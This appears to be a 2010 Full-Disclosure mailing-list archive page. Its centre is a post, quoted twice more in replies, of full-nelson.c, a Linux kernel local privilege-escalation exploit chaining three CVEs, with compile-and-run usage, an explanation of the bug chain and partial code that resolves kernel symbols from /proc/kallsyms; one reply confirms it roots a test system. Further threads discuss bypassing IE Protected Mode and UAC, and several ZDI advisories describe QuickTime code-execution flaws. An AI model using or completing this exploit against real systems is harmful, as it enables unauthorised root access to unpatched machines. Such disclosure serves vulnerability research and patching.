http://security.ubuntu.com/ubuntu/pool/main/i/imagemagick/libmagick10_6.3.7.9.dfsg1-2ubuntu1.2_i386.deb Size/MD5: 4019304 98323a0c914e381a0e0bc8068b9997c1 http://security.ubuntu.com/ubuntu/pool/main/i/imagemagick/libmagick9-dev_6.3.7.9.dfsg1-2ubuntu1.2_i386.deb Size/MD5: 1212736 f6275b43bd2ecc4c629057032bcce788 http://security.ubuntu.com/ubuntu/pool/universe/i/imagemagick/perlmagick_6.3.7.9.dfsg1-2ubuntu1.2_i386.deb Size/MD5: 173490 a1a50335c07d3cd4da0e164a77b786ec lpia architecture (Low Power Intel Architecture): http://ports.ubuntu.com/pool/main/i/imagemagick/imagemagick_6.3.7.9.dfsg1-2ubuntu1.2_lpia.deb Size/MD5: 1421674 4ea7f22d519d1073667a36c82843316a http://ports.ubuntu.com/pool/main/i/imagemagick/libmagick++10_6.3.7.9.dfsg1-2ubuntu1.2_lpia.deb Size/MD5: 170594 d6112fb2191fe51be397e0ce54f84d62 http://ports.ubuntu.com/pool/main/i/imagemagick/libmagick++9-dev_6.3.7.9.dfsg1-2ubuntu1.2_lpia.deb Size/MD5: 212186 d079bcfe815abe5998bb8d40fa6587ef http://ports.ubuntu.com/pool/main/i/imagemagick/libmagick10_6.3.7.9.dfsg1-2ubuntu1.2_lpia.deb Size/MD5: 4057610 c53e03fcd2bfd4353832edd729717ceb http://ports.ubuntu.com/pool/main/i/imagemagick/libmagick9-dev_6.3.7.9.dfsg1-2ubuntu1.2_lpia.deb Size/MD5: 1218594 3d83c5a0aad2a4f5ef33b716f0366d1d http://ports.ubuntu.com/pool/universe/i/imagemagick/perlmagick_6.3.7.9.dfsg1-2ubuntu1.2_lpia.deb Size/MD5: 174990 a925be46501da63050d875561d603b5c powerpc architecture (Apple Macintosh G3/G4/G5): http://ports.ubuntu.com/pool/main/i/imagemagick/imagemagick_6.3.7.9.dfsg1-2ub
[Full-disclosure] Linux kernel exploit
Hi all,
I've included here a proof-of-concept local privilege escalation exploit
for Linux. Please read the header for an explanation of what's going
on. Without further ado, I present full-nelson.c:
Happy hacking,
Dan
--snip--
/*
* Linux Kernel <= 2.6.37 local privilege escalation
* by Dan Rosenberg
* @djrbliss on twitter
*
* Usage:
* gcc full-nelson.c -o full-nelson
* ./full-nelson
*
* This exploit leverages three vulnerabilities to get root, all of which were
* discovered by Nelson Elhage:
*
* CVE-2010-4258
* -
* This is the interesting one, and the reason I wrote this exploit. If a
* thread is created via clone(2) using the CLONE_CHILD_CLEARTID flag, a NULL
* word will be written to a user-specified pointer when that thread exits.
* This write is done using put_user(), which ensures the provided destination
* resides in valid userspace by invoking access_ok(). However, Nelson
* discovered that when the kernel performs an address limit override via
* set_fs(KERNEL_DS) and the thread subsequently OOPSes (via BUG, page fault,
* etc.), this override is not reverted before calling put_user() in the exit
* path, allowing a user to write a NULL word to an arbitrary kernel address.
* Note that this issue requires an additional vulnerability to trigger.
*
* CVE-2010-3849
* -
* This is a NULL pointer dereference in the Econet protocol. By itself, it's
* fairly benign as a local denial-of-service. It's a perfect candidate to
* trigger the above issue, since it's reachable via sock_no_sendpage(), which
* subsequently calls sendmsg under KERNEL_DS.
*
* CVE-2010-3850
* -
* I wouldn't be able to reach the NULL pointer dereference and trigger the
* OOPS if users weren't able to assign Econet addresses to arbitrary
* interfaces due to a missing capabilities check.
*
* In the interest of public safety, this exploit was specifically designed to
* be limited:
*
* * The particular symbols I resolve are not exported on Slackware or Debian
* * Red Hat does not support Econet by default
* * CVE-2010-3849 and CVE-2010-3850 have both been patched by Ubuntu and
*Debian
*
* However, the important issue, CVE-2010-4258, affects everyone, and it would
* be trivial to find an unpatched DoS under KERNEL_DS and write a slightly
* more sophisticated version of this that doesn't have the roadblocks I put in
* to prevent abuse by script kiddies.
*
* Tested on unpatched Ubuntu 10.04 kernels, both x86 and x86-64.
*
* NOTE: the exploit process will deadlock and stay in a zombie state after you
* exit your root shell because the Econet thread OOPSes while holding the
* Econet mutex. It wouldn't be too hard to fix this up, but I didn't bother.
*
* Greets to spender, taviso, stealth, pipacs, jono, kees, and bla
*/
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
/* How many bytes should we clear in our
* function pointer to put it into userspace? */
#ifdef __x86_64__
#define SHIFT 24
#define OFFSET 3
#else
#define SHIFT 8
#define OFFSET 1
#endif
/* thanks spender... */
unsigned long get_kernel_sym(char *name)
{
FILE *f;
unsigned long addr;
char dummy;
char sname[512];
struct utsname ver;
int ret;
int rep = 0;
int oldstyle = 0;
f = fopen("/proc/kallsyms", "r");
if (f == NULL) {
f = fopen("/proc/ksyms", "r");
if (f == NULL)
goto fallback;
oldstyle = 1;
}
repeat:
ret = 0;
while(ret != EOF) {
if (!oldstyle)
ret = fscanf(f, "%p %c %s\n", (void **)&addr, &dummy,
sname);
else {
ret = fscanf(f, "%p %s\n", (void **)&addr, sname);
if (ret == 2) {
char *p;
if (strstr(sname, "_O/") || strstr(sname,
"_S."))
continue;
p = strrchr(sname, '_');
if (p > ((char *)sname + 5) && !strncmp(p - 3,
"smp", 3)) {
p = p - 4;
while (p > (char *)sname && *(p - 1) ==
'_')
p--;
*p = '\0';
}
}
}
if (ret == 0) {
fscanf(f, "%s\n", sname);
continue;
}
if (!strcmp(name, sname)) {
fprintf(stdout, " [+] Resolved %s to %p%s\n", name,
(void *)addr, rep ? " (via System.map)" : "");
fclose(f);
return addr;
}
}
fclose(f);
Re: [Full-disclosure] Linux kernel exploit
Anyone tested this in sandbox yet?
On 07/12/2010 20:25, Dan Rosenberg wrote:
> Hi all,
>
> I've included here a proof-of-concept local privilege escalation exploit
> for Linux. Please read the header for an explanation of what's going
> on. Without further ado, I present full-nelson.c:
>
> Happy hacking,
> Dan
>
>
> --snip--
>
> /*
> * Linux Kernel<= 2.6.37 local privilege escalation
> * by Dan Rosenberg
> * @djrbliss on twitter
> *
> * Usage:
> * gcc full-nelson.c -o full-nelson
> * ./full-nelson
> *
> * This exploit leverages three vulnerabilities to get root, all of which
> were
> * discovered by Nelson Elhage:
> *
> * CVE-2010-4258
> * -
> * This is the interesting one, and the reason I wrote this exploit. If a
> * thread is created via clone(2) using the CLONE_CHILD_CLEARTID flag, a NULL
> * word will be written to a user-specified pointer when that thread exits.
> * This write is done using put_user(), which ensures the provided
> destination
> * resides in valid userspace by invoking access_ok(). However, Nelson
> * discovered that when the kernel performs an address limit override via
> * set_fs(KERNEL_DS) and the thread subsequently OOPSes (via BUG, page fault,
> * etc.), this override is not reverted before calling put_user() in the exit
> * path, allowing a user to write a NULL word to an arbitrary kernel address.
> * Note that this issue requires an additional vulnerability to trigger.
> *
> * CVE-2010-3849
> * -
> * This is a NULL pointer dereference in the Econet protocol. By itself,
> it's
> * fairly benign as a local denial-of-service. It's a perfect candidate to
> * trigger the above issue, since it's reachable via sock_no_sendpage(),
> which
> * subsequently calls sendmsg under KERNEL_DS.
> *
> * CVE-2010-3850
> * -
> * I wouldn't be able to reach the NULL pointer dereference and trigger the
> * OOPS if users weren't able to assign Econet addresses to arbitrary
> * interfaces due to a missing capabilities check.
> *
> * In the interest of public safety, this exploit was specifically designed
> to
> * be limited:
> *
> * * The particular symbols I resolve are not exported on Slackware or
> Debian
> * * Red Hat does not support Econet by default
> * * CVE-2010-3849 and CVE-2010-3850 have both been patched by Ubuntu and
> *Debian
> *
> * However, the important issue, CVE-2010-4258, affects everyone, and it
> would
> * be trivial to find an unpatched DoS under KERNEL_DS and write a slightly
> * more sophisticated version of this that doesn't have the roadblocks I put
> in
> * to prevent abuse by script kiddies.
> *
> * Tested on unpatched Ubuntu 10.04 kernels, both x86 and x86-64.
> *
> * NOTE: the exploit process will deadlock and stay in a zombie state after
> you
> * exit your root shell because the Econet thread OOPSes while holding the
> * Econet mutex. It wouldn't be too hard to fix this up, but I didn't
> bother.
> *
> * Greets to spender, taviso, stealth, pipacs, jono, kees, and bla
> */
>
> #include
> #include
> #include
> #include
> #include
> #include
> #include
> #include
> #include
> #include
> #include
> #include
>
> /* How many bytes should we clear in our
> * function pointer to put it into userspace? */
> #ifdef __x86_64__
> #define SHIFT 24
> #define OFFSET 3
> #else
> #define SHIFT 8
> #define OFFSET 1
> #endif
>
> /* thanks spender... */
> unsigned long get_kernel_sym(char *name)
> {
> FILE *f;
> unsigned long addr;
> char dummy;
> char sname[512];
> struct utsname ver;
> int ret;
> int rep = 0;
> int oldstyle = 0;
>
> f = fopen("/proc/kallsyms", "r");
> if (f == NULL) {
> f = fopen("/proc/ksyms", "r");
> if (f == NULL)
> goto fallback;
> oldstyle = 1;
> }
>
> repeat:
> ret = 0;
> while(ret != EOF) {
> if (!oldstyle)
> ret = fscanf(f, "%p %c %s\n", (void **)&addr,&dummy,
> sname);
> else {
> ret = fscanf(f, "%p %s\n", (void **)&addr, sname);
> if (ret == 2) {
> char *p;
> if (strstr(sname, "_O/") || strstr(sname,
> "_S."))
> continue;
> p = strrchr(sname, '_');
> if (p> ((char *)sname + 5)&& !strncmp(p - 3,
> "smp", 3)) {
> p = p - 4;
> while (p> (char *)sname&& *(p - 1) ==
> '_')
> p--;
> *p = '\0';
> }
> }
> }
> if (ret == 0) {
> fscanf(f, "%s\
Re: [Full-disclosure] Linux kernel exploit
Yep, just tested it in an Ubuntu 10.10 sandbox I have (running kernel
2.6.35-22-generic). Works as expected.
Great job Dan. You're full of win!
Regards,
Ryan Sears
- Original Message -
From: "Cal Leeming [Simplicity Media Ltd]"
To: "Dan Rosenberg"
Cc: full-disclosure@lists.grok.org.uk, bugt...@securityfocus.com
Sent: Tuesday, December 7, 2010 4:06:44 PM GMT -05:00 US/Canada Eastern
Subject: Re: [Full-disclosure] Linux kernel exploit
Anyone tested this in sandbox yet?
On 07/12/2010 20:25, Dan Rosenberg wrote:
> Hi all,
>
> I've included here a proof-of-concept local privilege escalation exploit
> for Linux. Please read the header for an explanation of what's going
> on. Without further ado, I present full-nelson.c:
>
> Happy hacking,
> Dan
>
>
> --snip--
>
> /*
> * Linux Kernel<= 2.6.37 local privilege escalation
> * by Dan Rosenberg
> * @djrbliss on twitter
> *
> * Usage:
> * gcc full-nelson.c -o full-nelson
> * ./full-nelson
> *
> * This exploit leverages three vulnerabilities to get root, all of which
> were
> * discovered by Nelson Elhage:
> *
> * CVE-2010-4258
> * -
> * This is the interesting one, and the reason I wrote this exploit. If a
> * thread is created via clone(2) using the CLONE_CHILD_CLEARTID flag, a NULL
> * word will be written to a user-specified pointer when that thread exits.
> * This write is done using put_user(), which ensures the provided
> destination
> * resides in valid userspace by invoking access_ok(). However, Nelson
> * discovered that when the kernel performs an address limit override via
> * set_fs(KERNEL_DS) and the thread subsequently OOPSes (via BUG, page fault,
> * etc.), this override is not reverted before calling put_user() in the exit
> * path, allowing a user to write a NULL word to an arbitrary kernel address.
> * Note that this issue requires an additional vulnerability to trigger.
> *
> * CVE-2010-3849
> * -
> * This is a NULL pointer dereference in the Econet protocol. By itself,
> it's
> * fairly benign as a local denial-of-service. It's a perfect candidate to
> * trigger the above issue, since it's reachable via sock_no_sendpage(),
> which
> * subsequently calls sendmsg under KERNEL_DS.
> *
> * CVE-2010-3850
> * -
> * I wouldn't be able to reach the NULL pointer dereference and trigger the
> * OOPS if users weren't able to assign Econet addresses to arbitrary
> * interfaces due to a missing capabilities check.
> *
> * In the interest of public safety, this exploit was specifically designed
> to
> * be limited:
> *
> * * The particular symbols I resolve are not exported on Slackware or
> Debian
> * * Red Hat does not support Econet by default
> * * CVE-2010-3849 and CVE-2010-3850 have both been patched by Ubuntu and
> *Debian
> *
> * However, the important issue, CVE-2010-4258, affects everyone, and it
> would
> * be trivial to find an unpatched DoS under KERNEL_DS and write a slightly
> * more sophisticated version of this that doesn't have the roadblocks I put
> in
> * to prevent abuse by script kiddies.
> *
> * Tested on unpatched Ubuntu 10.04 kernels, both x86 and x86-64.
> *
> * NOTE: the exploit process will deadlock and stay in a zombie state after
> you
> * exit your root shell because the Econet thread OOPSes while holding the
> * Econet mutex. It wouldn't be too hard to fix this up, but I didn't
> bother.
> *
> * Greets to spender, taviso, stealth, pipacs, jono, kees, and bla
> */
>
> #include
> #include
> #include
> #include
> #include
> #include
> #include
> #include
> #include
> #include
> #include
> #include
>
> /* How many bytes should we clear in our
> * function pointer to put it into userspace? */
> #ifdef __x86_64__
> #define SHIFT 24
> #define OFFSET 3
> #else
> #define SHIFT 8
> #define OFFSET 1
> #endif
>
> /* thanks spender... */
> unsigned long get_kernel_sym(char *name)
> {
> FILE *f;
> unsigned long addr;
> char dummy;
> char sname[512];
> struct utsname ver;
> int ret;
> int rep = 0;
> int oldstyle = 0;
>
> f = fopen("/proc/kallsyms", "r");
> if (f == NULL) {
> f = fopen("/proc/ksyms", "r");
> if (f == NULL)
> goto fallback;
> oldstyle = 1;
> }
>
> repeat:
> ret = 0;
> while(ret != EOF) {
> if (!oldstyle)
> ret = fscanf(f, "%p %c %s\n", (void **)&addr,&dummy,
> sname);
> else {
> ret = fscanf(f, "%p %s\n", (void **)&addr, sname);
> if (ret == 2) {
> char *p;
> if (strstr(sname, "_O/") || strstr(sname,
> "_S."))
> continue;
> p = strrchr(sname, '_');
> i
Re: [Full-disclosure] Linux kernel exploit
On Tue, Dec 7, 2010 at 12:25 PM, Dan Rosenberg wrote: > ... I've included here a proof-of-concept local privilege escalation > exploit... > * This exploit leverages three vulnerabilities to get root, all of which were > * discovered by Nelson Elhage: >... > * However, the important issue, CVE-2010-4258, affects everyone, and it would > * be trivial to find an unpatched DoS under KERNEL_DS and write a slightly > * more sophisticated version of this... nice :) clearly demonstrates why risk is complicated and seemingly minor defects (worth delaying patches for weeks/months? ;) can combine into truly ugly vulnerabilities... ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] verizon vs m$
On 12/07/2010 07:12 AM, valdis.kletni...@vt.edu wrote: > On Tue, 07 Dec 2010 07:16:34 EST, Larry Seltzer said: > 2. some interpret it as a feature and some as a bug? >> >>> Does it have to be either? >> >> It sounds to me as if this is a deliberate design decision, and >> people are disagreeing over the severity of its implications. > > Some people refer to that as a "feee-tchure" or "Broken As Designed". > It's technically not a bug, but it does violate the Principle of > Least Surprise. I say it's a bug. See there's this thing called "Protected Mode". Now I don't know about you guys, but that name could lead someone like me to think that it was supposed to give you some kind of protection. But whatever it is, it can be bypassed by this new Son-of-Stuxnet APT 3.0 exploit technology called a "socket". > http://windows.microsoft.com/en-us/windows-vista/products/features/communication > Internet Explorer > Browse the web with Internet Explorer 7. Protected Mode provides > security and data protection for Windows users. > http://msdn.microsoft.com/en-us/library/bb250462%28VS.85%29.aspx > Understanding and Working in Protected Mode Internet Explorer Summary > In Windows Vista, Internet Explorer 7 runs in Protected Mode, which > helps protect users from attack by running the Internet Explorer > process with greatly restricted privileges. > Protected Mode is an important step forward in security for Internet > Explorer (IE); it helps protect users from attack by running an IE > process with greatly restricted privileges on Windows Vista. While > Protected Mode does not protect against all forms of attack, it > significantly reduces the ability of an attack to write, alter, or > destroy data on the user's machine or to install malicious code. So if this thing allows any code running in "Protected Mode" to bridge over to "not Protected mode" with just a local socket and other methods, then what good is it? What then did "Protected Mode" ever protect you from? Attackers who didn't know about local sockets or would never be clever enough to figure it out? Consider that Local Intranet Zone will usually do NTLMv2 authentication without any user intervention. Even if he couldn't escape from "Protected Mode", an attacker who can open listening sockets can possibly grab NTLMv2 password hashes for offline cracking, or even forward those authentications to get into lots of other devices which will accept them, e.g. SSL VPNs. This is just like UAC. Back when it came out, I thought UAC and the elevation token scheme were the coolest new OS security feature since W^X and ASLR. I gave props to Microsoft for enduring all the negativity they got for UAC. But when I learned that they had exempted their own executables from UAC with an "auto elevate" signature in the mainifest I just couldn't believe it. With trembling hands, I clicked on the microsoft.com product features page and there it was: It was clearly promoting UAC and process elevation as a security feature. A Microsoft product turned out not to provide an effective security boundary after all. I was *shocked*. On that day, my innocence was forever lost. This is, IMHO, disingenuous of them to promote something as a feature which enhances security and then say later "No of course it's not a security boundary, whatever would make you think that?". What possible definition of the term "security boundary" would _not_ encompass a facility for "running the Internet Explorer process with greatly restricted privileges" such that it "significantly reduces the ability of an attack to write, alter, or destroy data on the user's machine or to install malicious code"?! If process elevation is not a "security boundary", then what does it elevate from, what does it elevate to, and what do you call the difference between them? I assume others have reported this by now, but last I checked a year or so ago, some of these "auto elevate" processes in Vista were loading DLLs by names obtained from registry values that were writable by non-elevated tokens. If you say something offers "protection" and people pay money to upgrade to this security-as-a-feature, and this "protection" is trivially bypassed, that's a security bug. You should fix it or give people their money back. Don't then say "well we never actually said it was a security boundary". - Marsh ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] verizon vs m$
See Marsh, there's this thing called keyboard and mouse which are trivially a huge security threat to the user. Users shouldn't be allowed to use them. The average user should be staring at the same MSN homepage all day long. Then we should pay Microsoft (and really, all the ingenious security researchers out there) that thought up the idea. Maybe even patent it or something. On Tue, Dec 7, 2010 at 9:51 PM, Marsh Ray wrote: > On 12/07/2010 07:12 AM, valdis.kletni...@vt.edu wrote: > > On Tue, 07 Dec 2010 07:16:34 EST, Larry Seltzer said: > > 2. some interpret it as a feature and some as a bug? > >> > >>> Does it have to be either? > >> > >> It sounds to me as if this is a deliberate design decision, and > >> people are disagreeing over the severity of its implications. > > > > Some people refer to that as a "feee-tchure" or "Broken As Designed". > > It's technically not a bug, but it does violate the Principle of > > Least Surprise. > > I say it's a bug. > > See there's this thing called "Protected Mode". Now I don't know about > you guys, but that name could lead someone like me to think that it was > supposed to give you some kind of protection. But whatever it is, it can > be bypassed by this new Son-of-Stuxnet APT 3.0 exploit technology called > a "socket". > > > > http://windows.microsoft.com/en-us/windows-vista/products/features/communication > > Internet Explorer > > Browse the web with Internet Explorer 7. Protected Mode provides > > security and data protection for Windows users. > > > http://msdn.microsoft.com/en-us/library/bb250462%28VS.85%29.aspx > > Understanding and Working in Protected Mode Internet Explorer Summary > > In Windows Vista, Internet Explorer 7 runs in Protected Mode, which > > helps protect users from attack by running the Internet Explorer > > process with greatly restricted privileges. > > Protected Mode is an important step forward in security for Internet > > Explorer (IE); it helps protect users from attack by running an IE > > process with greatly restricted privileges on Windows Vista. While > > Protected Mode does not protect against all forms of attack, it > > significantly reduces the ability of an attack to write, alter, or > > destroy data on the user's machine or to install malicious code. > > So if this thing allows any code running in "Protected Mode" to bridge > over to "not Protected mode" with just a local socket and other methods, > then what good is it? What then did "Protected Mode" ever protect you > from? Attackers who didn't know about local sockets or would never be > clever enough to figure it out? > > Consider that Local Intranet Zone will usually do NTLMv2 authentication > without any user intervention. Even if he couldn't escape from > "Protected Mode", an attacker who can open listening sockets can > possibly grab NTLMv2 password hashes for offline cracking, or even > forward those authentications to get into lots of other devices which > will accept them, e.g. SSL VPNs. > > This is just like UAC. Back when it came out, I thought UAC and the > elevation token scheme were the coolest new OS security feature since > W^X and ASLR. I gave props to Microsoft for enduring all the negativity > they got for UAC. But when I learned that they had exempted their own > executables from UAC with an "auto elevate" signature in the mainifest I > just couldn't believe it. > > With trembling hands, I clicked on the microsoft.com product features > page and there it was: It was clearly promoting UAC and process > elevation as a security feature. A Microsoft product turned out not to > provide an effective security boundary after all. I was *shocked*. > On that day, my innocence was forever lost. > > This is, IMHO, disingenuous of them to promote something as a feature > which enhances security and then say later "No of course it's not a > security boundary, whatever would make you think that?". > > What possible definition of the term "security boundary" would _not_ > encompass a facility for "running the Internet Explorer process with > greatly restricted privileges" such that it "significantly reduces the > ability of an attack to write, alter, or destroy data on the user's > machine or to install malicious code"?! > > If process elevation is not a "security boundary", then what does it > elevate from, what does it elevate to, and what do you call the > difference between them? > > I assume others have reported this by now, but last I checked a year or > so ago, some of these "auto elevate" processes in Vista were loading > DLLs by names obtained from registry values that were writable by > non-elevated tokens. > > If you say something offers "protection" and people pay money to upgrade > to this security-as-a-feature, and this "protection" is trivially > bypassed, that's a security bug. You should fix it or give people their > money back. Don't then say "well we never actually said it was a > security boundary". > > - Marsh > > __
[Full-disclosure] ZDI-10-258: Apple QuickTime 3GP Parsing Remote Code Execution Vulnerability
ZDI-10-258: Apple QuickTime 3GP Parsing Remote Code Execution Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-10-258 December 7, 2010 -- CVE ID: CVE-2010-1508 -- CVSS: 10, (AV:N/AC:L/Au:N/C:C/I:C/A:C) -- Affected Vendors: Apple -- Affected Products: Apple Quicktime -- Vulnerability Details: This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Apple Quicktime. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the Quicktime.qts module responsible for parsing media files. While handling 3GP streams a function within this module a loop trusts a value directly from the media file and uses it during memory copy operations. By supplying a large enough value this buffer can be overflowed leading to arbitrary code execution under the context of the user accessing the file. -- Vendor Response: Apple has issued an update to correct this vulnerability. More details can be found at: http://support.apple.com/kb/HT4447 -- Disclosure Timeline: 2010-01-06 - Vulnerability reported to vendor 2010-12-07 - Coordinated public release of advisory -- Credit: This vulnerability was discovered by: * Moritz Jodeit of n.runs AG -- About the Zero Day Initiative (ZDI): Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. TippingPoint does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product. Our vulnerability disclosure policy is available online at: http://www.zerodayinitiative.com/advisories/disclosure_policy/ Follow the ZDI on Twitter: http://twitter.com/thezdi ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] ZDI-10-259: Apple QuickTime FPX Subimage Count Out-of-bounds Counter Remote Code Execution Vulnerability
ZDI-10-259: Apple QuickTime FPX Subimage Count Out-of-bounds Counter Remote Code Execution Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-10-259 December 7, 2010 -- CVE ID: CVE-2010-3801 -- CVSS: 9, (AV:N/AC:L/Au:N/C:P/I:P/A:C) -- Affected Vendors: Apple -- Affected Products: Apple Quicktime -- TippingPoint(TM) IPS Customer Protection: TippingPoint IPS customers have been protected against this vulnerability by Digital Vaccine protection filter ID 10654. For further product information on the TippingPoint IPS, visit: http://www.tippingpoint.com -- Vulnerability Details: This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Apple Quicktime. User interaction is required in that a user must be coerced into opening up a malicious document or visiting a malicious website. The specific flaw exists within the way the application parses a particular property out of a flashpix file. The application will explicitly trust a field in the property as a length for a loop over an array of data structures. If this field's value is larger than the number of objects, the application will utilize objects outside of this array. Successful exploitation can lead to code execution under the context of the application. -- Vendor Response: Apple has issued an update to correct this vulnerability. More details can be found at: http://support.apple.com/kb/HT4447 -- Disclosure Timeline: 2010-06-01 - Vulnerability reported to vendor 2010-12-07 - Coordinated public release of advisory -- Credit: This vulnerability was discovered by: * Damian Put -- About the Zero Day Initiative (ZDI): Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. TippingPoint does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product. Our vulnerability disclosure policy is available online at: http://www.zerodayinitiative.com/advisories/disclosure_policy/ Follow the ZDI on Twitter: http://twitter.com/thezdi ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] ZDI-10-260: Apple QuickTime Panorama Atom Remote Code Execution Vulnerability
ZDI-10-260: Apple QuickTime Panorama Atom Remote Code Execution Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-10-260 December 7, 2010 -- CVE ID: CVE-2010-3802 -- CVSS: 9, (AV:N/AC:L/Au:N/C:P/I:P/A:C) -- Affected Vendors: Apple -- Affected Products: Apple Quicktime -- Vulnerability Details: This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Apple Quicktime. User interaction is required to exploit this vulnerability in that a user must be coerced into visiting a malicious page or opening a malicious file. The specific flaw exists within Apple's support for Panoramic Images and occurs due to the application trusting a particular field for calculation of an offset. Due to the field being treated as a signed integer, the calculated offset can result in a pointer outside the bounds of the expected buffer. Upon usage of this out-of-bounds pointer, the application will write proceed to write image data to the invalid location. Successful exploitation can lead to code execution under the context of the application. -- Vendor Response: Apple has issued an update to correct this vulnerability. More details can be found at: http://support.apple.com/kb/HT4447 -- Disclosure Timeline: 2010-03-22 - Vulnerability reported to vendor 2010-12-07 - Coordinated public release of advisory -- Credit: This vulnerability was discovered by: * Anonymous -- About the Zero Day Initiative (ZDI): Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. TippingPoint does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product. Our vulnerability disclosure policy is available online at: http://www.zerodayinitiative.com/advisories/disclosure_policy/ Follow the ZDI on Twitter: http://twitter.com/thezdi ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] ZDI-10-261: Apple QuickTime PICT File PackBits Remote Code Execution Vulnerability
ZDI-10-261: Apple QuickTime PICT File PackBits Remote Code Execution Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-10-261 December 7, 2010 -- CVE ID: CVE-2010-3800 -- CVSS: 9, (AV:N/AC:L/Au:N/C:P/I:P/A:C) -- Affected Vendors: Apple -- Affected Products: Apple Quicktime -- Vulnerability Details: This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Apple QuickTime. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the application's implementation of a custom compression algorithm. The application will trust a field within a DirectBitsRect structure which is used for an allocation, and later attempt to decompress data into this buffer. Due to the value for the allocation being different from the length of the data being decompressed a buffer overflow will occur which can lead to code execution with the privileges of the application. -- Vendor Response: Apple has issued an update to correct this vulnerability. More details can be found at: http://support.apple.com/kb/HT4447 -- Disclosure Timeline: 2010-06-01 - Vulnerability reported to vendor 2010-12-07 - Coordinated public release of advisory -- Credit: This vulnerability was discovered by: * Damian Put * Procyun * Andrzej Dyjak -- About the Zero Day Initiative (ZDI): Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. TippingPoint does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product. Our vulnerability disclosure policy is available online at: http://www.zerodayinitiative.com/advisories/disclosure_policy/ Follow the ZDI on Twitter: http://twitter.com/thezdi ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] ZDI-10-262: Apple QuickTime PICT directBitsRect Pack3 Remote Code Execution Vulnerability
ZDI-10-262: Apple QuickTime PICT directBitsRect Pack3 Remote Code Execution Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-10-262 December 7, 2010 -- CVE ID: CVE-2010-3800 -- CVSS: 9, (AV:N/AC:L/Au:N/C:P/I:P/A:C) -- Affected Vendors: Apple -- Affected Products: Apple Quicktime -- TippingPoint(TM) IPS Customer Protection: TippingPoint IPS customers have been protected against this vulnerability by Digital Vaccine protection filter ID 10661. For further product information on the TippingPoint IPS, visit: http://www.tippingpoint.com -- Vulnerability Details: This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Apple Quicktime. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within how the application parses directBitsRect records within a .pict file. When decompressing data within this structure, the application will allocate space for the target buffer using fields described within the file and then use a different length to decompress the total data from the file. This can lead to code execution under the context of the application. -- Vendor Response: Apple has issued an update to correct this vulnerability. More details can be found at: http://support.apple.com/kb/HT4447 -- Disclosure Timeline: 2010-11-05 - Vulnerability reported to vendor 